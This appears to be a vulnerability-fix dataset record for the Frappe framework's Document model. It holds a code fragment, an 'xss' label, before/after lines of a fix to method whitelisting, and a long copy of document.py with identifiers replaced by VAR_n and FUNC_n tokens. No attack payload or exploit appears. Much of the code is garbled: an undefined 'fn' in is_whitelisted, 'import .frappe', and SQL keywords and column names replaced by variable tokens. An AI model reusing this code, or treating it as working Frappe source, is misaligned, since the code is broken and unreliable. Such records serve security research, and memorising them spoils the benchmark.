if getattr(self.meta, 'track_seen', False):
frappe.db.set_value(self.doctype, self.name, "_seen", json.dumps([frappe.session.user]), update_modified=False)
def notify_update(self):
"""Publish realtime that the current document is modified"""
if frappe.flags.in_patch: return
frappe.publish_realtime("doc_update", {"modified": self.modified, "doctype": self.doctype, "name": self.name},
doctype=self.doctype, docname=self.name, after_commit=True)
if not self.meta.get("read_only") and not self.meta.get("issingle") and \
not self.meta.get("istable"):
data = {
"doctype": self.doctype,
"name": self.name,
"user": frappe.session.user
}
frappe.publish_realtime("list_update", data, after_commit=True)
def db_set(self, fieldname, value=None, update_modified=True, notify=False, commit=False):
"""Set a value in the document object, update the timestamp and update the database.
WARNING: This method does not trigger controller validations and should
be used very carefully.
:param fieldname: fieldname of the property to be updated, or a {"field":"value"} dictionary
:param value: value of the property to be updated
:param update_modified: default True. updates the `modified` and `modified_by` properties
:param notify: default False. run doc.notify_updated() to send updates via socketio
:param commit: default False. run frappe.db.commit()
"""
if isinstance(fieldname, dict):
self.update(fieldname)
else:
self.set(fieldname, value)
if update_modified and (self.doctype, self.name) not in frappe.flags.currently_saving:
# don't update modified timestamp if called from post save methods
# like on_update or on_submit
self.set("modified", now())
self.set("modified_by", frappe.session.user)
self.load_doc_before_save()
# to trigger notification on value change
self.run_method('before_change')
frappe.db.set_value(self.doctype, self.name, fieldname, value,
self.modified, self.modified_by, update_modified=update_modified)
self.run_method('on_change')
if notify:
self.notify_update()
self.clear_cache()
if commit:
frappe.db.commit()
def db_get(self, fieldname):
"""get database value for this fieldname"""
return frappe.db.get_value(self.doctype, self.name, fieldname)
def check_no_back_links_exist(self):
"""Check if document links to any active document before Cancel."""
from frappe.model.delete_doc import check_if_doc_is_linked, check_if_doc_is_dynamically_linked
if not self.flags.ignore_links:
check_if_doc_is_linked(self, method="Cancel")
check_if_doc_is_dynamically_linked(self, method="Cancel")
def save_version(self):
"""Save version info"""
# don't track version under following conditions
if (not getattr(self.meta, 'track_changes', False)
or self.doctype == 'Version'
or self.flags.ignore_version
or frappe.flags.in_install
or (not self._doc_before_save and frappe.flags.in_patch)):
return
version = frappe.new_doc('Version')
if not self._doc_before_save:
version.for_insert(self)
version.insert(ignore_permissions=True)
elif version.set_diff(self._doc_before_save, self):
version.insert(ignore_permissions=True)
if not frappe.flags.in_migrate:
# follow since you made a change?
follow_document(self.doctype, self.name, frappe.session.user)
@staticmethod
def hook(f):
"""Decorator: Make method `hookable` (i.e. extensible by another app).
Note: If each hooked method returns a value (dict), then all returns are
collated in one dict and returned. Ideally, don't return values in hookable
methods, set properties in the document."""
def add_to_return_value(self, new_return_value):
if isinstance(new_return_value, dict):
if not self.get("_return_value"):
self._return_value = {}
self._return_value.update(new_return_value)
else:
self._return_value = new_return_value or self.get("_return_value")
def compose(fn, *hooks):
def runner(self, method, *args, **kwargs):
add_to_return_value(self, fn(self, *args, **kwargs))
for f in hooks:
add_to_return_value(self, f(self, method, *args, **kwargs))
return self._return_value
return runner
def composer(self, *args, **kwargs):
hooks = []
method = f.__name__
doc_events = frappe.get_doc_hooks()
for handler in doc_events.get(self.doctype, {}).get(method, []) \
+ doc_events.get("*", {}).get(method, []):
hooks.append(frappe.get_attr(handler))
composed = compose(f, *hooks)
return composed(self, method, *args, **kwargs)
return composer
def is_whitelisted(self, method_name):
method = getattr(self, method_name, None)
if not fn:
raise NotFound("Method {0} not found".format(method_name))
is_whitelisted(getattr(method, '__func__', method))
def validate_value(self, fieldname, condition, val2, doc=None, raise_exception=None):
"""Check that value of fieldname should be 'condition' val2
else throw Exception."""
error_condition_map = {
"in": _("one of"),
"not in": _("none of"),
"^": _("beginning with"),
}
if not doc:
doc = self
val1 = doc.get_value(fieldname)
df = doc.meta.get_field(fieldname)
val2 = doc.cast(val2, df)
if not frappe.compare(val1, condition, val2):
label = doc.meta.get_label(fieldname)
condition_str = error_condition_map.get(condition, condition)
if doc.parentfield:
msg = _("Incorrect value in row {0}: {1} must be {2} {3}").format(doc.idx, label, condition_str, val2)
else:
msg = _("Incorrect value: {0} must be {1} {2}").format(label, condition_str, val2)
# raise passed exception or True
msgprint(msg, raise_exception=raise_exception or True)
def validate_table_has_rows(self, parentfield, raise_exception=None):
"""Raise exception if Table field is empty."""
if not (isinstance(self.get(parentfield), list) and len(self.get(parentfield)) > 0):
label = self.meta.get_label(parentfield)
frappe.throw(_("Table {0} cannot be empty").format(label), raise_exception or frappe.EmptyTableError)
def round_floats_in(self, doc, fieldnames=None):
"""Round floats for all `Currency`, `Float`, `Percent` fields for the given doc.
:param doc: Document whose numeric properties are to be rounded.
:param fieldnames: [Optional] List of fields to be rounded."""
if not fieldnames:
fieldnames = (df.fieldname for df in
doc.meta.get("fields", {"fieldtype": ["in", ["Currency", "Float", "Percent"]]}))
for fieldname in fieldnames:
doc.set(fieldname, flt(doc.get(fieldname), self.precision(fieldname, doc.parentfield)))
def get_url(self):
"""Returns Desk URL for this document. `/app/Form/{doctype}/{name}`"""
return "/app/Form/{doctype}/{name}".format(doctype=self.doctype, name=self.name)
def add_comment(self, comment_type='Comment', text=None, comment_email=None, link_doctype=None, link_name=None, comment_by=None):
"""Add a comment to this document.
:param comment_type: e.g. `Comment`. See Communication for more info."""
out = frappe.get_doc({
"doctype":"Comment",
'comment_type': comment_type,
"comment_email": comment_email or frappe.session.user,
"comment_by": comment_by,
"reference_doctype": self.doctype,
"reference_name": self.name,
"content": text or comment_type,
"link_doctype": link_doctype,
"link_name": link_name
}).insert(ignore_permissions=True)
return out
def add_seen(self, user=None):
"""add the given/current user to list of users who have seen this document (_seen)"""
if not user:
user = frappe.session.user
if self.meta.track_seen:
_seen = self.get('_seen') or []
_seen = frappe.parse_json(_seen)
if user not in _seen:
_seen.append(user)
frappe.db.set_value(self.doctype, self.name, '_seen', json.dumps(_seen), update_modified=False)
frappe.local.flags.commit = True
def add_viewed(self, user=None):
"""add log to communication when a user views a document"""
if not user:
user = frappe.session.user
if hasattr(self.meta, 'track_views') and self.meta.track_views:
frappe.get_doc({
"doctype": "View Log",
"viewed_by": frappe.session.user,
"reference_doctype": self.doctype,
"reference_name": self.name,
}).insert(ignore_permissions=True)
frappe.local.flags.commit = True
def get_signature(self):
"""Returns signature (hash) for private URL."""
return hashlib.sha224(get_datetime_str(self.creation).encode()).hexdigest()
def get_liked_by(self):
liked_by = getattr(self, "_liked_by", None)
if liked_by:
return json.loads(liked_by)
else:
return []
def set_onload(self, key, value):
if not self.get("__onload"):
self.set("__onload", frappe._dict())
self.get("__onload")[key] = value
def get_onload(self, key=None):
if not key:
return self.get("__onload", frappe._dict())
return self.get('__onload')[key]
def queue_action(self, action, **kwargs):
"""Run an action in background. If the action has an inner function,
like _submit for submit, it will call that instead"""
# call _submit instead of submit, so you can override submit to call
# run_delayed based on some action
# See: Stock Reconciliation
from frappe.utils.background_jobs import enqueue
if hasattr(self, '_' + action):
action = '_' + action
if file_lock.lock_exists(self.get_signature()):
frappe.throw(_('This document is currently queued for execution. Please try again'),
title=_('Document Queued'))
self.lock()
enqueue('frappe.model.document.execute_action', doctype=self.doctype, name=self.name,
action=action, **kwargs)
def lock(self, timeout=None):
"""Creates a lock file for the given document. If timeout is set,
it will retry every 1 second for acquiring the lock again
:param timeout: Timeout in seconds, default 0"""
signature = self.get_signature()
if file_lock.lock_exists(signature):
lock_exists = True
if timeout:
for i in range(timeout):
time.sleep(1)
if not file_lock.lock_exists(signature):
lock_exists = False
break
if lock_exists:
raise frappe.DocumentLockedError
file_lock.create_lock(signature)
def unlock(self):
"""Delete the lock file for this document"""
file_lock.delete_lock(self.get_signature())
# validation helpers
def validate_from_to_dates(self, from_date_field, to_date_field):
"""
Generic validation to verify date sequence
"""
if date_diff(self.get(to_date_field), self.get(from_date_field)) < 0:
frappe.throw(_('{0} must be after {1}').format(
frappe.bold(self.meta.get_label(to_date_field)),
frappe.bold(self.meta.get_label(from_date_field)),
), frappe.exceptions.InvalidDates)
def get_assigned_users(self):
assignments = frappe.get_all('ToDo',
fields=['owner'],
filters={
'reference_type': self.doctype,
'reference_name': self.name,
'status': ('!=', 'Cancelled'),
})
users = set([assignment.owner for assignment in assignments])
return users
def add_tag(self, tag):
"""Add a Tag to this document"""
from frappe.desk.doctype.tag.tag import DocTags
DocTags(self.doctype).add(self.name, tag)
def get_tags(self):
"""Return a list of Tags attached to this document"""
from frappe.desk.doctype.tag.tag import DocTags
return DocTags(self.doctype).get_tags(self.name).split(",")[1:]
def execute_action(doctype, name, action, **kwargs):
"""Execute an action on a document (called by background worker)"""
doc = frappe.get_doc(doctype, name)
doc.unlock()
try:
getattr(doc, action)(**kwargs)
except Exception:
frappe.db.rollback()
# add a comment (?)
if frappe.local.message_log:
msg = json.loads(frappe.local.message_log[-1]).get('message')
else:
msg = '<pre><code>' + frappe.get_traceback() + '</pre></code>'
doc.add_comment('Comment', _('Action Failed') + '<br><br>' + msg)
doc.notify_update()
| xss | {
"code": [
"from frappe import _, msgprint",
"\tdef whitelist(f):",
"\t\tf.whitelisted = True",
"\t\treturn f",
"\tdef is_whitelisted(self, method):",
"\t\tfn = getattr(self, method, None)",
"\t\t\traise NotFound(\"Method {0} not found\".format(method))",
"\t\telif not getattr(fn, \"whitelisted\", False):",
"\t\t\traise Forbidden(\"Method {0} not whitelisted\".format(method))"
],
"line_no": [
7,
129,
131,
132,
1151,
1152,
1154,
1155,
1156
]
} | {
"code": [
"from frappe import _, msgprint, is_whitelisted",
"\tdef whitelist(fn):",
"\t\tfrappe.whitelist()(fn)",
"\t\treturn fn",
"\tdef is_whitelisted(self, method_name):",
"\t\tmethod = getattr(self, method_name, None)",
"\t\t\traise NotFound(\"Method {0} not found\".format(method_name))",
"\t\tis_whitelisted(getattr(method, '__func__', method))"
],
"line_no": [
7,
129,
131,
132,
1151,
1152,
1154,
1156
]
} |
from __future__ import unicode_literals, print_function
import .frappe
import time
from frappe import _, msgprint
from frappe.utils import .flt, cstr, now, get_datetime_str, file_lock, date_diff
from frappe.model.base_document import BaseDocument, get_controller
from frappe.model.naming import .set_new_name
from six import iteritems, string_types
from werkzeug.exceptions import NotFound, Forbidden
import hashlib, json
from frappe.model import optional_fields, VAR_81
from frappe.model.workflow import .validate_workflow
from frappe.model.workflow import set_workflow_state_on_action
from frappe.utils.global_search import update_global_search
from frappe.integrations.doctype.webhook import run_webhooks
from frappe.desk.form.document_follow import .follow_document
from frappe.core.doctype.server_script.server_script_utils import run_server_script_for_doc_event
def FUNC_0(*VAR_0, **VAR_1):
if VAR_0:
if isinstance(VAR_0[0], BaseDocument):
return VAR_0[0]
elif isinstance(VAR_0[0], string_types):
VAR_2 = VAR_0[0]
elif isinstance(VAR_0[0], dict):
VAR_1 = VAR_0[0]
else:
raise ValueError('First non keyword argument must be a string or dict')
if len(VAR_0) < 2 and VAR_1:
if 'doctype' in VAR_1:
VAR_2 = VAR_1['doctype']
else:
raise ValueError('"doctype" is a required key')
VAR_5 = get_controller(VAR_2)
if VAR_5:
return VAR_5(*VAR_0, **VAR_1)
raise ImportError(VAR_2)
class CLASS_0(BaseDocument):
def __init__(self, *VAR_0, **VAR_1):
self.doctype = self.name = None
self._default_new_docs = {}
self.flags = frappe._dict()
if VAR_0 and VAR_0[0] and isinstance(VAR_0[0], string_types):
if len(VAR_0)==1:
self.doctype = self.name = VAR_0[0]
else:
self.doctype = VAR_0[0]
if isinstance(VAR_0[1], dict):
self.name = frappe.db.get_value(VAR_0[0], VAR_0[1], "name")
if self.name is None:
frappe.throw(_("{0} {1} not found").format(_(VAR_0[0]), VAR_0[1]),
frappe.DoesNotExistError)
else:
self.name = VAR_0[1]
if 'for_update' in VAR_1:
self.flags.for_update = VAR_1.get('for_update')
self.load_from_db()
return
if VAR_0 and VAR_0[0] and isinstance(VAR_0[0], dict):
VAR_1 = VAR_0[0]
if VAR_1:
super(CLASS_0, self).__init__(VAR_1)
self.init_valid_columns()
else:
raise ValueError('Illegal arguments')
@staticmethod
def FUNC_2(VAR_6):
VAR_6.whitelisted = True
return VAR_6
def FUNC_3(self):
self.load_from_db()
def FUNC_4(self):
if not getattr(self, "_metaclass", False) and self.meta.issingle:
VAR_80 = frappe.db.get_singles_dict(self.doctype)
if not VAR_80:
single_doc = frappe.new_doc(self.doctype).as_dict()
VAR_80["name"] = self.doctype
del VAR_80["__islocal"]
super(CLASS_0, self).__init__(VAR_80)
self.init_valid_columns()
self._fix_numeric_types()
else:
VAR_21 = frappe.db.get_value(self.doctype, self.name, "*", as_dict=1, for_update=self.flags.for_update)
if not VAR_21:
frappe.throw(_("{0} {1} not found").format(_(self.doctype), self.name), frappe.DoesNotExistError)
super(CLASS_0, self).__init__(VAR_21)
if self.name=="DocType" and self.doctype=="DocType":
from frappe.model.meta import DOCTYPE_TABLE_FIELDS
VAR_81 = DOCTYPE_TABLE_FIELDS
else:
VAR_81 = self.meta.get_table_fields()
for VAR_19 in VAR_81:
VAR_50 = frappe.db.get_values(VAR_19.options,
{"parent": self.name, "parenttype": self.doctype, "parentfield": VAR_19.fieldname},
"*", as_dict=True, order_by="idx asc")
if VAR_50:
self.set(VAR_19.fieldname, VAR_50)
else:
self.set(VAR_19.fieldname, [])
if hasattr(self, "__setup__"):
self.__setup__()
def FUNC_5(self):
if not getattr(self, "latest", None):
self.latest = frappe.get_doc(self.doctype, self.name)
return self.latest
def FUNC_6(self, VAR_7='read', VAR_8=None):
if not self.has_permission(VAR_7):
self.raise_no_permission_to(VAR_8 or VAR_7)
def FUNC_7(self, VAR_7="read", VAR_9=False):
if self.flags.ignore_permissions:
return True
return frappe.has_permission(self.doctype, VAR_7, self, VAR_9=verbose)
def FUNC_8(self, VAR_10):
frappe.flags.error_message = _('Insufficient Permission for {0}').format(self.doctype)
raise frappe.PermissionError
def FUNC_9(self, VAR_11=None, VAR_12=None, VAR_13=False,
VAR_14=None, VAR_15=None, VAR_16=True):
if self.flags.in_print:
return
self.flags.notifications_executed = []
if VAR_11!=None:
self.flags.ignore_permissions = VAR_11
if VAR_12!=None:
self.flags.ignore_links = VAR_12
if VAR_14!=None:
self.flags.ignore_mandatory = VAR_14
self.set("__islocal", True)
self.check_permission("create")
self._set_defaults()
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.run_method("before_insert")
self._validate_links()
self.set_new_name(VAR_15=set_name, VAR_16=set_child_names)
self.set_parent_in_children()
self.validate_higher_perm_levels()
self.flags.in_insert = True
self.run_before_save_methods()
self._validate()
self.set_docstatus()
self.flags.in_insert = False
if getattr(self.meta, "issingle", 0):
self.update_single(self.get_valid_dict())
else:
try:
self.db_insert()
except frappe.DuplicateEntryError as e:
if not VAR_13:
raise e
for VAR_21 in self.get_all_children():
VAR_21.db_insert()
self.run_method("after_insert")
self.flags.in_insert = True
if self.get("amended_from"):
self.copy_attachments_from_amended_from()
self.flags.update_log_for_doc_creation = True
self.run_post_save_methods()
self.flags.in_insert = False
if hasattr(self, "__islocal"):
delattr(self, "__islocal")
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
if not (frappe.flags.in_migrate or frappe.local.flags.in_install or frappe.flags.in_setup_wizard):
follow_document(self.doctype, self.name, frappe.session.user)
return self
def FUNC_10(self, *VAR_0, **VAR_1):
return self._save(*VAR_0, **VAR_1)
def FUNC_11(self, VAR_11=None, VAR_17=None):
if self.flags.in_print:
return
self.flags.notifications_executed = []
if VAR_11!=None:
self.flags.ignore_permissions = VAR_11
self.flags.ignore_version = frappe.flags.in_test if VAR_17 is None else VAR_17
if self.get("__islocal") or not self.get("name"):
self.insert()
return
self.check_permission("write", "save")
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.set_parent_in_children()
self.set_name_in_children()
self.validate_higher_perm_levels()
self._validate_links()
self.run_before_save_methods()
if self._action != "cancel":
self._validate()
if self._action == "update_after_submit":
self.validate_update_after_submit()
self.set_docstatus()
if self.meta.issingle:
self.update_single(self.get_valid_dict())
else:
self.db_update()
self.update_children()
self.run_post_save_methods()
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
return self
def FUNC_12(self):
from frappe.desk.form.load import get_attachments
for attach_item in get_attachments(self.doctype, self.amended_from):
VAR_82 = frappe.get_doc({
"doctype": "File",
"file_url": attach_item.file_url,
"file_name": attach_item.file_name,
"attached_to_name": self.name,
"attached_to_doctype": self.doctype,
"folder": "Home/Attachments"})
VAR_82.save()
def FUNC_13(self):
for VAR_19 in self.meta.get_table_fields():
self.update_child_table(VAR_19.fieldname, VAR_19)
def FUNC_14(self, VAR_18, VAR_19=None):
VAR_48 = []
if not VAR_19:
VAR_19 = self.meta.get_field(VAR_18)
for VAR_21 in self.get(VAR_19.fieldname):
VAR_21.db_update()
VAR_48.append(VAR_21.name)
if VAR_19.options in (self.flags.ignore_children_type or []):
return
if VAR_48:
VAR_83 = frappe.db.sql("""select VAR_3 from `tab{0}` where parent=%s
and VAR_24=%s and VAR_34=%s
and VAR_3 not in ({1})""".format(VAR_19.options, ','.join(['%s'] * len(VAR_48))),
[self.name, self.doctype, VAR_18] + VAR_48)
if len(VAR_83) > 0:
frappe.db.sql("""delete from `tab{0}` where VAR_3 in ({1})""".format(VAR_19.options,
','.join(['%s'] * len(VAR_83))), tuple(row[0] for row in VAR_83))
else:
frappe.db.sql("""delete from `tab{0}` where parent=%s
and VAR_24=%s and VAR_34=%s""".format(VAR_19.options),
(self.name, self.doctype, VAR_18))
def FUNC_15(self):
return getattr(self, '_doc_before_save', None)
def FUNC_16(self, VAR_18):
VAR_49 = self.get_doc_before_save()
return VAR_49.get(VAR_18)!=self.get(VAR_18) if VAR_49 else True
def FUNC_17(self, VAR_20=False, VAR_15=None, VAR_16=True):
if self.flags.name_set and not VAR_20:
return
if self.get("__newname"):
self.name = self.get("__newname")
self.flags.name_set = True
return
if VAR_15:
self.name = VAR_15
else:
FUNC_17(self)
if VAR_16:
for VAR_21 in self.get_all_children():
FUNC_17(VAR_21)
self.flags.name_set = True
def FUNC_18(self):
return self.get(self.meta.get_title_field())
def FUNC_19(self):
def FUNC_80():
VAR_84 = self.as_dict()
for VAR_43, VAR_26 in iteritems(VAR_84):
if VAR_26==None:
VAR_84[VAR_43] = ""
return VAR_84
if self.meta.get("title_field")=="title":
VAR_19 = self.meta.get_field(self.meta.title_field)
if VAR_19.options:
self.set(VAR_19.fieldname, VAR_19.options.format(**FUNC_80()))
elif self.is_new() and not self.get(VAR_19.fieldname) and VAR_19.default:
self.set(VAR_19.fieldname, VAR_19.default.format(**FUNC_80()))
def FUNC_20(self, VAR_21):
frappe.db.sql("""delete from `tabSingles` where VAR_2=%s""", self.doctype)
for field, VAR_26 in iteritems(VAR_21):
if field != "doctype":
frappe.db.sql("""insert into `tabSingles` (VAR_2, field, VAR_26)
VAR_84 (%s, %s, %s)""", (self.doctype, field, VAR_26))
if self.doctype in frappe.db.value_cache:
del frappe.db.value_cache[self.doctype]
def FUNC_21(self):
self._original_modified = self.modified
self.modified = now()
self.modified_by = frappe.session.user
if not self.creation:
self.creation = self.modified
if not self.owner:
self.owner = self.modified_by
for VAR_21 in self.get_all_children():
VAR_21.modified = self.modified
VAR_21.modified_by = self.modified_by
if not VAR_21.owner:
VAR_21.owner = self.owner
if not VAR_21.creation:
VAR_21.creation = self.creation
frappe.flags.currently_saving.append((self.doctype, self.name))
def FUNC_22(self):
if self.docstatus==None:
self.docstatus=0
for VAR_21 in self.get_all_children():
VAR_21.docstatus = self.docstatus
def FUNC_23(self):
self._validate_mandatory()
self._validate_data_fields()
self._validate_selects()
self._validate_non_negative()
self._validate_length()
self._extract_images_from_text_editor()
self._sanitize_content()
self._save_passwords()
self.validate_workflow()
VAR_50 = self.get_all_children()
for VAR_21 in VAR_50:
VAR_21._validate_data_fields()
VAR_21._validate_selects()
VAR_21._validate_non_negative()
VAR_21._validate_length()
VAR_21._extract_images_from_text_editor()
VAR_21._sanitize_content()
VAR_21._save_passwords()
if self.is_new():
for VAR_18 in optional_fields:
self.set(VAR_18, None)
else:
self.validate_set_only_once()
def FUNC_24(self):
def FUNC_81(VAR_19):
if self.parentfield:
return "{} {} #{}: {} {}".format(frappe.bold(_(self.doctype)),
_("Row"), self.idx, _("Value cannot be negative for"), frappe.bold(_(VAR_19.label)))
else:
return _("Value cannot be negative for {0}: {1}").format(_(VAR_19.parent), frappe.bold(_(VAR_19.label)))
for VAR_19 in self.meta.get('fields', {'non_negative': ('=', 1),
'fieldtype': ('in', ['Int', 'Float', 'Currency'])}):
if flt(self.get(VAR_19.fieldname)) < 0:
VAR_87 = FUNC_81(VAR_19)
frappe.throw(VAR_87, frappe.NonNegativeError, title=_("Negative Value"))
def FUNC_25(self):
if frappe.flags.in_install == 'frappe': return
VAR_51 = self.meta.get_workflow()
if VAR_51:
FUNC_25(self)
if not self._action == 'save':
set_workflow_state_on_action(self, VAR_51, self._action)
def FUNC_26(self):
VAR_52 = self.meta.get_set_only_once_fields()
if VAR_52 and self._doc_before_save:
for field in VAR_52:
VAR_97 = False
VAR_26 = self.get(field.fieldname)
VAR_53 = self._doc_before_save.get(field.fieldname)
if field.fieldtype in VAR_81:
VAR_97 = not self.is_child_table_same(field.fieldname)
elif field.fieldtype in ('Date', 'Datetime', 'Time'):
VAR_97 = str(VAR_26) != str(VAR_53)
else:
VAR_97 = VAR_26 != VAR_53
if VAR_97:
frappe.throw(_("Value cannot be changed for {0}").format(self.meta.get_label(field.fieldname)),
frappe.CannotChangeConstantError)
return False
def FUNC_27(self, VAR_18):
VAR_26 = self.get(VAR_18)
VAR_53 = self._doc_before_save.get(VAR_18)
VAR_54 = True
if len(VAR_53) != len(VAR_26):
VAR_54 = False
else:
for i, VAR_21 in enumerate(VAR_53):
VAR_98 = VAR_26[i].as_dict(convert_dates_to_str = True)
VAR_99 = VAR_21.as_dict(convert_dates_to_str = True)
for VAR_43 in ('modified', 'modified_by', 'creation'):
del VAR_98[VAR_43]
del VAR_99[VAR_43]
if VAR_99 != VAR_98:
VAR_54 = False
break
return VAR_54
def FUNC_28(self):
if frappe.session.user == "Administrator":
return
VAR_55 = False
VAR_56 = self.meta.fields.copy()
for table_field in self.meta.get_table_fields():
VAR_56 += frappe.get_meta(table_field.options).fields or []
for VAR_19 in VAR_56:
if VAR_19.permlevel > 0:
VAR_55 = True
break
if not VAR_55:
return
VAR_57 = self.get_permlevel_access('read')
for VAR_19 in self.meta.fields:
if VAR_19.permlevel and not VAR_19.permlevel in VAR_57:
self.set(VAR_19.fieldname, None)
for table_field in self.meta.get_table_fields():
for VAR_19 in frappe.get_meta(table_field.options).fields or []:
if VAR_19.permlevel and not VAR_19.permlevel in VAR_57:
for child in self.get(table_field.fieldname) or []:
child.set(VAR_19.fieldname, None)
def FUNC_29(self):
if self.flags.ignore_permissions or frappe.flags.in_install:
return
if frappe.session.user == "Administrator":
return
VAR_57 = self.get_permlevel_access()
VAR_58 = self.meta.get_high_permlevel_fields()
if VAR_58:
self.reset_values_if_no_permlevel_access(VAR_57, VAR_58)
if self.is_new(): return
for VAR_19 in self.meta.get_table_fields():
VAR_58 = frappe.get_meta(VAR_19.options).get_high_permlevel_fields()
if VAR_58:
for VAR_21 in self.get(VAR_19.fieldname):
VAR_21.reset_values_if_no_permlevel_access(VAR_57, VAR_58)
def FUNC_30(self, VAR_22='write'):
if not hasattr(self, "_has_access_to"):
self._has_access_to = {}
self._has_access_to[VAR_22] = []
VAR_59 = frappe.get_roles()
for perm in self.get_permissions():
if perm.role in VAR_59 and perm.get(VAR_22):
if perm.permlevel not in self._has_access_to[VAR_22]:
self._has_access_to[VAR_22].append(perm.permlevel)
return self._has_access_to[VAR_22]
def FUNC_31(self, VAR_18, VAR_19=None, VAR_22='read'):
if not VAR_19:
VAR_19 = self.meta.get_field(VAR_18)
return VAR_19.permlevel in self.get_permlevel_access(VAR_22)
def FUNC_32(self):
if self.meta.istable:
permissions = frappe.get_meta(self.parenttype).permissions
else:
VAR_85 = self.meta.permissions
return VAR_85
def FUNC_33(self):
if frappe.flags.in_import:
return
VAR_60 = frappe.new_doc(self.doctype, as_dict=True)
self.update_if_missing(VAR_60)
for VAR_19 in self.meta.get_table_fields():
VAR_60 = frappe.new_doc(VAR_19.options, as_dict=True)
VAR_26 = self.get(VAR_19.fieldname)
if isinstance(VAR_26, list):
for VAR_21 in VAR_26:
VAR_21.update_if_missing(VAR_60)
def FUNC_34(self):
VAR_61 = False
self._action = "save"
if not self.get('__islocal'):
if self.meta.issingle:
VAR_100 = frappe.db.sql("""select VAR_26 from tabSingles
where VAR_2=%s and field='modified' for update""", self.doctype)
VAR_100 = VAR_100 and VAR_100[0][0]
if VAR_100 and VAR_100 != cstr(self._original_modified):
VAR_61 = True
else:
VAR_101 = frappe.db.sql("""select VAR_100, VAR_23 from `tab{0}`
where VAR_3 = %s for update""".format(self.doctype), self.name, as_dict=True)
if not VAR_101:
frappe.throw(_("Record does not exist"))
else:
VAR_101 = tmp[0]
VAR_100 = cstr(VAR_101.modified)
if VAR_100 and VAR_100 != cstr(self._original_modified):
VAR_61 = True
self.check_docstatus_transition(VAR_101.docstatus)
if VAR_61:
frappe.msgprint(_("Error: CLASS_0 has been VAR_100 after you have opened it") \
+ (" (%s, %s). " % (VAR_100, self.modified)) \
+ _("Please refresh to get the latest document."),
VAR_33=frappe.TimestampMismatchError)
else:
self.check_docstatus_transition(0)
def FUNC_35(self, VAR_23):
if not self.docstatus:
self.docstatus = 0
if VAR_23==0:
if self.docstatus==0:
self._action = "save"
elif self.docstatus==1:
self._action = "submit"
self.check_permission("submit")
else:
raise frappe.DocstatusTransitionError(_("Cannot change VAR_23 from 0 to 2"))
elif VAR_23==1:
if self.docstatus==1:
self._action = "update_after_submit"
self.check_permission("submit")
elif self.docstatus==2:
self._action = "cancel"
self.check_permission("cancel")
else:
raise frappe.DocstatusTransitionError(_("Cannot change VAR_23 from 1 to 0"))
elif VAR_23==2:
raise frappe.ValidationError(_("Cannot edit cancelled document"))
def FUNC_36(self):
for VAR_21 in self.get_all_children():
VAR_21.parent = self.name
VAR_21.parenttype = self.doctype
def FUNC_37(self):
for VAR_21 in self.get_all_children():
if not VAR_21.name:
FUNC_17(VAR_21)
def FUNC_38(self):
if self.flags.ignore_validate_update_after_submit:
return
self._validate_update_after_submit()
for VAR_21 in self.get_all_children():
if VAR_21.is_new() and self.meta.get_field(VAR_21.parentfield).allow_on_submit:
continue
VAR_21._validate_update_after_submit()
def FUNC_39(self):
if self.flags.ignore_mandatory:
return
VAR_62 = self._get_missing_mandatory_fields()
for VAR_21 in self.get_all_children():
VAR_62.extend(VAR_21._get_missing_mandatory_fields())
if not VAR_62:
return
for VAR_18, VAR_87 in VAR_62:
msgprint(VAR_87)
if frappe.flags.print_messages:
print(self.as_json().encode("utf-8"))
raise frappe.MandatoryError('[{VAR_2}, {VAR_3}]: {fields}'.format(
fields=", ".join((each[0] for each in VAR_62)),
VAR_2=self.doctype,
VAR_3=self.name))
def FUNC_40(self):
if self.flags.ignore_links or self._action == "cancel":
return
VAR_63, VAR_64 = self.get_invalid_links()
for VAR_21 in self.get_all_children():
VAR_86 = VAR_21.get_invalid_links(is_submittable=self.meta.is_submittable)
VAR_63.extend(VAR_86[0])
VAR_64.extend(VAR_86[1])
if VAR_63:
VAR_87 = ", ".join((each[2] for each in VAR_63))
frappe.throw(_("Could not find {0}").format(VAR_87),
frappe.LinkValidationError)
if VAR_64:
VAR_87 = ", ".join((each[2] for each in VAR_64))
frappe.throw(_("Cannot link cancelled document: {0}").format(VAR_87),
frappe.CancelledLinkError)
def FUNC_41(self, VAR_24=None):
VAR_65 = []
for VAR_19 in self.meta.get("fields", {"fieldtype": ['in', VAR_81]}):
if VAR_24:
if VAR_19.options==VAR_24:
return self.get(VAR_19.fieldname)
VAR_26 = self.get(VAR_19.fieldname)
if isinstance(VAR_26, list):
VAR_65.extend(VAR_26)
return VAR_65
def FUNC_42(self, VAR_25, *VAR_0, **VAR_1):
if "flags" in VAR_1:
del VAR_1["flags"]
if hasattr(self, VAR_25) and hasattr(getattr(self, VAR_25), "__call__"):
VAR_72 = lambda self, *VAR_0, **VAR_1: getattr(self, VAR_25)(*VAR_0, **VAR_1)
else:
VAR_72 = lambda self, *VAR_0, **VAR_1: None
VAR_72.__name__ = str(VAR_25)
VAR_66 = CLASS_0.hook(VAR_72)(self, *VAR_0, **VAR_1)
self.run_notifications(VAR_25)
run_webhooks(self, VAR_25)
run_server_script_for_doc_event(self, VAR_25)
return VAR_66
def FUNC_43(self, VAR_25, *VAR_0, **VAR_1):
return self.run_method(VAR_25, *VAR_0, **VAR_1)
def FUNC_44(self, VAR_25):
if (frappe.flags.in_import and frappe.flags.mute_emails) or frappe.flags.in_patch or frappe.flags.in_install:
return
if self.flags.notifications_executed==None:
self.flags.notifications_executed = []
from frappe.email.doctype.notification.notification import evaluate_alert
if self.flags.notifications == None:
VAR_88 = frappe.cache().hget('notifications', self.doctype)
if VAR_88==None:
VAR_88 = frappe.get_all('Notification', fields=['name', 'event', 'method'],
filters={'enabled': 1, 'document_type': self.doctype})
frappe.cache().hset('notifications', self.doctype, VAR_88)
self.flags.notifications = VAR_88
if not self.flags.notifications:
return
def FUNC_82(VAR_67):
if not VAR_67.name in self.flags.notifications_executed:
evaluate_alert(self, VAR_67.name, VAR_67.event)
self.flags.notifications_executed.append(VAR_67.name)
VAR_68 = {
"on_update": "Save",
"after_insert": "New",
"on_submit": "Submit",
"on_cancel": "Cancel"
}
if not self.flags.in_insert:
VAR_68['on_change'] = 'Value Change'
for VAR_67 in self.flags.notifications:
VAR_89 = VAR_68.get(VAR_25, None)
if VAR_89 and VAR_67.event == VAR_89:
FUNC_82(VAR_67)
elif VAR_67.event=='Method' and VAR_25 == VAR_67.method:
FUNC_82(VAR_67)
